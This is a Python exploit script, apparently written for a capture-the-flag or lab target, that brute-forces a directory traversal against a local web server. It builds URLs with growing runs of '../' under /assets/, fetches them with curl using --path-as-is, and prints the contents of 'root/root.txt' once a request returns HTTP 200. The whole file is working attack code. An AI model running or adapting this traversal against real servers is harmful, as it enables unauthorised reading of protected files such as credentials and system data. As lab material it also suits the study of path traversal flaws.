exploit.py

#!/usr/bin/env python3

import subprocess
import signal
from colorama import Fore, Style, init

# Initialize colorama
init(autoreset=True)

# Ctrl+C
def handle_exit_signal(sig, frame):
    print(f"{Fore.RED}[!] Interrupted by user.")
    exit(0)

signal.signal(signal.SIGINT, handle_exit_signal)

# Number of requests
request = 5

# Start
print(f"{Fore.CYAN}{Style.BRIGHT}Sending payloads...")

# Loop
for i in range(1, request + 1):
    payload = "../" * i
    url = "http://localhost:8081/assets/"
    
    file = "root/root.txt" # Flag root/root.txt

    final_payload = url + payload + file

    command = [
        "curl",
        "--path-as-is",
        "-i",
        final_payload
    ]

    # progress
    print(f"{Fore.YELLOW}Round {i}: {final_payload}")

    try: 
        output = subprocess.run(command, capture_output=True, text=True, check=True)
        response_headers = output.stdout.split("\r\n")

        # Extract status code
        status_line = response_headers[0]
        status_code = status_line.split(" ")[1]
        
        # 200?
        if status_code == "200":
            print(f"{Fore.GREEN}{Style.BRIGHT}[+] Success! File found.")
            print(f"{Fore.GREEN}{output.stdout}")
            break

    except subprocess.CalledProcessError as e:
        print(f"{Fore.RED}[!] Error: {e}")